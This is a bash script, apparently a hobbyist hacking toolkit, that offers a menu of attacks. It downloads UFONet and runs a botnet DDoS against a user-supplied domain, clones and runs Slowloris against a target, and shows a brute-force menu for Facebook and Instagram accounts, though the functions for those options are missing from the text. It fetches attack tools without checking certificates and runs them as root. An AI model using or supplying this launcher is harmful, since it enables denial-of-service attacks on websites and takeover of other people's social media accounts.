#!/usr/bin/env bash


#============================================================================================================
#	
#	Welcome To H4CK3R Script
#	H4CK3R Script By : Mr. H4CK3R
#	=======================================
#	My Facebook Account ::-
#	http://facebook.com/AriR.Abdulla
#	=======================================
#	My Youtube Channel ::-
#	https://www.youtube.com/channel/UCdigZ3N0EVMIEsS4hlIaaHg
#
#============================================================================================================


#This colour

	BlueF='\e[1;34m'
	magenta='\e[1;35m'
    cyan='\e[0;36m'
    green='\e[0;34m'
    okegreen='\033[92m'
    lightgreen='\e[1;32m'
    white='\e[1;37m'
    red='\e[1;31m'
    yellow='\e[1;33m'

#Checking...
if [ $(id -u) -ne 0 ] ; then
echo -e "$red" && echo "[x] This Script Must Be Run As Root!" && echo "" && exit 0
fi
resize -s 34 80


# ctrl_c
trap ctrl_c INT
ctrl_c() {
	echo "" && echo -e $BlueF" [$white"*"$BlueF]$red  Exiting ..." && sleep 0.2
	echo -e $BlueF" [$white"*"$BlueF]$red  GoodBye!"
	exit 0
}

# Title
printf '\033]2;BruteForce \a'
PS3="BruteForce>> "

##################
###START BOTNET###
BotNet()
{
echo "" && echo -e "$cyan"
echo -n -e "  Please Enter A domain Exp, http://google.com or IP - "
read Domain
if [ -z "$Domain" ]; then
		
 				echo -n -e $red"  Do you want exit?$cyan ( Yes / No ) : " ;tput sgr0
					read back
						if [ -z "$back" ]; then
							exit
							fi
						if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
												then
													echo "" && echo -e $BlueF" [$white"*"$BlueF]$red  Exiting ..." && sleep 0.2
                                                 	echo -e $BlueF" [$white"*"$BlueF]$red  GoodBye!"
	                                                exit 0
										elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
												then
												clear
                                                attacker
		
	fi
fi
		echo "" && echo -e "$cyan"
		echo -e "  Checking uFonet .. "
	cd tools
	if [ ! -d "ufonet" ]; then
		echo -e $red"  uFonet Not Found ! .. " && echo ""
		echo -e "  Wait for downloading"
		echo "" && sleep 2
		wget --no-check-certificate https://sourceforge.net/projects/ufonet/files/latest/download
		unzip "download" && rm download && clear
	fi
		if [ -d "ufonet" ]; then
	echo ""
		echo -e "  uFonet found" && echo ""
		echo -e "     ...:$BlueF Attacking Now $cyan:..."
	echo ""
		cd ufonet
		chmod 777 ufonet
		./ufonet --download-zombies
		./ufonet -a $Domain
	else
		echo "We have a problem ! sorry"
	fi
}
####END BOTNET###
#################


##################
##START SLOWLORIS#
SlowLoris()
{
		echo "" && echo -e "$cyan"
				echo -n -e "  Please Enter A domain Exp, www.google.com or IP - "
		read DOmain
	if [ -z "$DOmain" ]; then
		
 				echo -n -e $red"  Do you want exit?$cyan ( Yes / No ) : " ;tput sgr0
					read back
						if [ -z "$back" ]; then
							exit
							fi
						if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
												then
													echo "" && echo -e $BlueF" [$white"*"$BlueF]$red  Exiting ..." && sleep 0.2
                                                 	echo -e $BlueF" [$white"*"$BlueF]$red  GoodBye!"
	                                                exit 0
										elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
												then
												clear
                                                attacker
		
	fi
fi
		echo "" && echo -e "$cyan"
			echo -e "  Checking Slowloris .. " && sleep 1
		cd tools
			if [ ! -f "slowloris.pl" ]; then
			echo ""
		echo -e "  slowloris.pl Not Found ! .. "
		echo ""
				echo -e "  Wait for downloading"
				echo "" && sleep 1
				git clone https://github.com/llaera/slowloris.pl
		cd slowloris.pl
		else
				echo "" && echo -e "  Slowloris found" && echo ""
				echo -e "     ...:$BlueF Attacking Now $cyan:..."
		fi
				if [ -e "slowloris.pl" ]; then
		echo ""
				perl slowloris.pl -dns $DOmain
		else
				echo "$red"
				echo "  We have a problem ! sorry"
		fi
}
##END SLOWLORIS##
#################






#######################
#######################
BF()
{
clear && echo "" && echo -e "$BlueF"
echo -e $white"               ▄▄▄▄· ▄▄▄  ▄• ▄▌▄▄▄▄▄▄▄▄ .·▄▄▄      ▄▄▄   ▄▄· ▄▄▄ ."
echo -e $BlueF"               ▐█ ▀█▪▀▄ █·█▪██▌•██  ▀▄.▀·▐▄▄·▪     ▀▄ █·▐█ ▌▪▀▄.▀·"
echo -e $white"               ▐█▀▀█▄▐▀▀▄ █▌▐█▌ ▐█.▪▐▀▀▪▄██▪  ▄█▀▄ ▐▀▀▄ ██ ▄▄▐▀▀▪▄"
echo -e $red"               ██▄▪▐█▐█•█▌▐█▄█▌ ▐█▌·▐█▄▄▌██▌.▐█▌.▐▌▐█•█▌▐███▌▐█▄▄▌"
echo -e $white"               ·▀▀▀▀ .▀  ▀ ▀▀▀  ▀▀▀  ▀▀▀ ▀▀▀  ▀█▄▀▪.▀  ▀·▀▀▀  ▀▀▀ "
echo -e ""
echo -e $BlueF"               ░ ▒░▓  ░▒▒   ▓▒█░░ ▒░▓  ░░▓  ░ ▒░ ▒ ▒░ ▒░▓  ░▒▒   ▓"
echo -e $white"                ░ ░ ▒  ░ ▒   ▒▒ ░░ ░ ▒  ░ ▒ ░░ ░░ ░ ▒░ ░ ░ ▒  ░ ▒ "
echo -e $red"                 ░ ░    ░   ▒     ░ ░    ▒ ░   ░ ░ ░   ░ ░    ░   "
echo -e $cyan"                  ░  ░     ░  ░    ░   ░  ░      ░  ░     ░  ░    "
echo ""
echo -e "$white                    .======================================."
echo -e "$white                    |--------- Author: Mr. H4CK3R ---------|"
echo -e "$white                    |--------- FB.com/AriR.Abdulla --------|"
echo -e "$white                    '======================================'"
echo "" && echo "" && echo "" && echo -e "$green" && sleep 0.9
echo -e $BlueF"	        [$white"01"$BlueF]$cyan  FaceBook             $BlueF	[$white"03"$BlueF]$cyan  Wordlist"
echo -e $BlueF"	        [$white"02"$BlueF]$cyan  InstaGram            $BlueF	[$white"04"$BlueF]$cyan  Update sys"
echo -e $BlueF"                                   [$white"05"$BlueF]$cyan  Exit"
echo -e " " && echo -e ""
echo -n -e $red'  \033[4mBruteForce:\033[0m >> '; tput sgr0 #insert your choice
read bf



	if [[ "$bf" == "Exit" || "$bf" == "5" ]]; then
	echo "" && echo -e $BlueF" [$white"*"$BlueF]$red  Exiting ..." && sleep 0.2
	echo -e $BlueF" [$white"*"$BlueF]$red  GoodBye!"
	exit 0
	elif [ "$bf" = "1" ]; then
FB
	elif [ "$bf" = "2" ]; then
IG
	elif [ "$bf" = "3" ]; then
WL


else
			echo -e ""
 				echo -n -e $red"  Do you want exit?$cyan ( Yes / No ) : " ;tput sgr0
					read back
						if [ -z "$back" ]; then
							exit
							fi
						if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
												then
													echo "" && echo -e $BlueF" [$white"*"$BlueF]$red  Exiting ..." && sleep 0.2
                                                 	echo -e $BlueF" [$white"*"$BlueF]$red  GoodBye!"
	                                                exit 0
										elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
												then
												clear
                                                BF
	fi
fi
}


#######################
####################### 
BF
